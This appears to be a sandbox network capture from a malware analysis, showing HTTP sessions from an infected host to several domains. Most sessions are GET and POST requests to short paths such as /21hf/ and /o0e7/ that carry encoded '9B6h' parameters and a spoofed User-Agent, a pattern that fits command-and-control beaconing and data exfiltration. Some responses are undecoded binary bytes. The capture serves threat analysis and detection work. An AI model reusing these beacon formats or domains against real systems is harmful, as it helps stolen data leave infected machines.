                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474003; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=dQ6dBoD8cDhAPpTjSd6I; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:03 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.11.20 | 49785 | 176.57.64.102 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:06.085262060 CEST | 550 | OUT | GET /mktg/?9B6h=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:40:06.348920107 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=g1KJrCKAbyTfnKRz; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474006; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=nhkafp7zj4SxosVkXiVL; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:06 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 738
                                                                                                                                                                                                                                                              Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                                                                                                                                                                                                                                                              ETag: "2e2-620a674a57ae6"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br
Oct 9, 2024 13:40:06.348932028 CEST | 175 | IN | Data Ascii: > <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
45 | 192.168.11.20 | 49794 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:41.636502981 CEST | 558 | OUT | GET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:40:41.739375114 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:40:41 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: f6169c14-8aa0-403d-80e9-03edbe4a29b5
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==
                                                                                                                                                                                                                                                              set-cookie: parking_session=f6169c14-8aa0-403d-80e9-03edbe4a29b5; expires=Wed, 09 Oct 2024 11:55:41 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:40:41.739388943 CEST | 886 | IN | Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjYxNjljMTQtOGFhMC00MDNkLTgwZTktMDNlZGJlNGEyOWI1IiwicGFnZV90aW1lIjoxNzI4NDc0MDQxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.11.20 | 49795 | 103.247.8.53 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:48.141407013 CEST | 832 | OUT | POST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
Oct 9, 2024 13:40:48.716856956 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:48 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499835014 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499900103 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.871454954 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872560024 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872683048 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.11.20 | 49796 | 103.247.8.53 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:51.042990923 CEST | 852 | OUT | POST /21hf/ HTTP/1.1
Host: www.asa-malukuutara.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.asa-malukuutara.com
Cache-Control: no-cache
Connection: close
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
Referer: http://www.asa-malukuutara.com/21hf/
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:40:51.583117962 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:40:51 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: br
Content-Length: 12492
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.11.20 | 49797 | 103.247.8.53 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:53.936989069 CEST | 1289 | OUT | POST /21hf/ HTTP/1.1
Host: www.asa-malukuutara.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.asa-malukuutara.com
Cache-Control: no-cache
Connection: close
Content-Length: 7369
Content-Type: application/x-www-form-urlencoded
Referer: http://www.asa-malukuutara.com/21hf/
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:40:54.481220961 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:54 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.11.20 | 49798 | 103.247.8.53 | 80

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:56.824830055 CEST | 556 | OUT | GET /21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:40:57.298561096 CEST | 521 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:57 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Location: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.11.20 | 49799 | 72.14.178.174 | 80

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:41:10.607431889 CEST | 820 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
Oct 9, 2024 13:41:10.741637945 CEST | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:10 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.11.20 | 49800 | 72.14.178.174 | 80

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:41:13.279257059 CEST | 840 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqAbm7RH7QXYFcWH7DlmLHKVKbo0vd3cUthqFrdIUZ6Z34swyE4SdDBdo8ygZQTvElQkkgwA18/NUTXBPWyzcnaj30swu9rLRDvjLB13mDm1sYU7OydszX5v/bys34WMTkc1kCmeLYBoY=
Oct 9, 2024 13:41:13.412662983 CEST | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:13 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.11.20 | 49801 | 72.14.178.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:41:15.950918913 CEST | 2578 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:41:15.950939894 CEST | 5156 | OUT
                                                                                                                                                                                                                                                              Data Ascii: 5Wt5QhRJbToK6+k7Zv45RM8cr4L8rVGoyFVU6B4XFAjaE1O83NpeScMuuKkKzIijCzFiYK3Wnd5ygKQyL1ec7VEhjgAWK5cdF+PEkuE7EKWmCbe9O75wXTbA/w1c1QJFtyk7GhHu3BlbwUiKpwvq2cI0+5JQSyvG7mEZhqpklNcmUVzy2dR8sx/GgUoyjVm945CX7tjNS6j66MTVT3sV95nq550dF8oYPX+IzFFZU8YxF5uNEaJ
Oct 9, 2024 13:41:15.950992107 CEST | 255 | OUT
                                                                                                                                                                                                                                                              Data Ascii: kCKuDaa6eEUGjvWWXafr/gzLa70+0geHK10VvboehHG0vW5p7ltCDaBczoHJcRoFCRbM9EyUgQhpWQdgEh31XaNTamiriTOSrGkJBkJR6g45lN645d2MbbEti5x3BV9I/rRLSRo9VogA58zlStlux4p67phhocUA7m2yRyUhdscW8GCfckjYd/+PfeAY1ruZn7XmQesgnGvk0gmKqu74Qg/XkxDsvyJiUU/d6UL15+UgK2nqGzj
Oct 9, 2024 13:41:16.085145950 CEST | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:16 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.11.20 | 49802 | 72.14.178.174 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:41:18.618822098 CEST | 552 | OUT | GET /o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:41:18.753396034 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:18 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: 49C<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728474078.0025735182&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICI5QjZoPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZGbFM9M2xkSDVka0gtZEJMZiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsa [TRUNCATED]
Oct 9, 2024 13:41:18.753633976 CEST | 59 | IN
                                                                                                                                                                                                                                                              Data Ascii: } </script> </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.11.20 | 49803 | 172.67.191.241 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:42:56.221096992 CEST | 832 | OUT | POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
